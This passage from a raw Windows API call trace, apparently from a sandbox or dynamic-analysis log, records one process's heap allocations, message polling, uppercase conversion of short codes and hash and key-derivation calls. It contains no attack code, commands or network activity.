lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0166.186] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0166.186] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0166.186] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0166.186] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0166.186] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a58 [0166.186] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0166.186] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0166.186] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0166.186] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c38 [0166.187] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0166.187] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0166.187] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0166.187] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0166.187] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0166.187] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0166.187] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0166.187] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dd8 [0166.187] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0166.187] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0166.187] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0166.187] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0166.187] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2de8 [0166.187] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cd8 [0166.187] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0166.187] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a18 [0166.187] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0166.187] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6be8 [0166.187] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0166.187] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0166.187] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0166.188] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0166.188] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0166.188] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0166.188] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0166.188] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dd8 [0166.188] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0166.188] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0166.188] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0166.188] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0166.188] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a48 [0166.188] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6508 [0166.188] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5c8 [0166.188] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x249bb10 [0166.188] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0166.188] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6558 [0166.188] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5c8 [0166.188] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0166.188] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0166.188] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0166.188] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0166.188] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0166.188] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0166.188] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dd8 [0166.188] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0166.189] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0166.189] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0166.189] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aaec0 [0166.189] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0166.189] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0166.189] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0166.189] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2412248 [0166.189] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0166.189] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0166.189] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0166.189] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0166.189] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0060 | out: hHeap=0x25c0000) returned 1 [0166.189] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0060 [0166.189] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0166.189] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0166.189] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0166.189] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0060 | out: hHeap=0x25c0000) returned 1 [0166.189] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0166.189] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0166.189] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0166.189] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2412248 | out: hHeap=0x25c0000) returned 1 [0166.189] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0166.190] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0166.190] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0166.190] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0166.190] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0166.190] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0166.190] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0166.190] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2412248 [0166.190] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0166.190] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0166.190] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2412248 | out: hHeap=0x25c0000) returned 1 [0166.190] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa520 [0166.190] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0166.190] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0166.190] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2412248 [0166.190] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0166.190] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0166.190] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0166.190] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0070 [0166.190] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa730 [0166.190] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0070 | out: hHeap=0x25c0000) returned 1 [0166.190] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0070 [0166.190] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0166.190] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0166.191] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0166.191] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0070 | out: hHeap=0x25c0000) returned 1 [0166.191] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0166.191] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0166.191] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0166.191] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0060 | out: hHeap=0x25c0000) returned 1 [0166.191] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2412248 | out: hHeap=0x25c0000) returned 1 [0166.191] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0166.191] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0166.191] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0166.191] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0166.191] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2412248 [0166.191] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0166.191] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0166.191] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0166.191] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0070 [0166.191] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa730 [0166.191] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0070 | out: hHeap=0x25c0000) returned 1 [0166.191] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0166.191] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0166.191] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0166.191] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0060 | out: hHeap=0x25c0000) returned 1 [0166.192] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2412248 | out: hHeap=0x25c0000) returned 1 [0166.192] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0166.192] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0166.192] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2412248 [0166.192] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0166.192] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0166.192] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0166.192] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0166.192] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0166.192] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0060 | out: hHeap=0x25c0000) returned 1 [0166.192] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0166.192] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0166.192] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0166.192] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0166.192] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2412248 | out: hHeap=0x25c0000) returned 1 [0166.192] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0166.192] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0166.192] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0166.192] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0166.192] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0166.193] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0166.193] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0166.193] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0166.193] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0166.193] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0060 | out: hHeap=0x25c0000) returned 1 [0166.193] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0166.193] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0166.193] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0060 | out: hHeap=0x25c0000) returned 1 [0166.193] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0166.193] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0166.193] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0166.193] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2412248 | out: hHeap=0x25c0000) returned 1 [0166.193] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0166.193] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0166.193] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0166.193] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0166.193] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2412248 | out: hHeap=0x25c0000) returned 1 [0166.193] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0166.193] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0166.193] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0166.194] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0166.194] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2412248 | out: hHeap=0x25c0000) returned 1 [0166.194] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0166.194] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0166.194] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0166.194] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0166.194] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0166.194] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0166.194] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0166.194] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0166.194] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0166.194] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0166.194] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0166.194] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0166.194] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0166.194] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0166.194] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0166.195] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0166.195] CryptCreateHash (in: hProv=0xab2890, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8bef50 | out: phHash=0x8bef50) returned 1 [0166.195] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0166.195] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0166.197] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0166.197] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0166.198] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0166.198] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0166.198] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0166.198] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0166.198] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0166.198] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0166.198] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0166.198] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0166.198] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0166.198] CryptHashData (hHash=0xaa55e0, pbData=0x34a00a0, dwDataLen=0x3, dwFlags=0x1) returned 1 [0166.198] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0166.198] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0166.198] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0166.198] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0166.198] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0166.198] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0166.198] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0166.199] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0166.199] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0166.199] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0166.199] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0166.199] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0166.199] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0166.199] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0166.199] CryptDeriveKey (in: hProv=0xab2890, Algid=0x6601, hBaseData=0xaa55e0, dwFlags=0x1, phKey=0x8bef50 | out: phKey=0x8bef50*=0xaa56a0) returned 1 [0166.199] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0166.199] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0166.199] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0150 [0166.199] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa460 [0166.199] RtlAllocateHeap 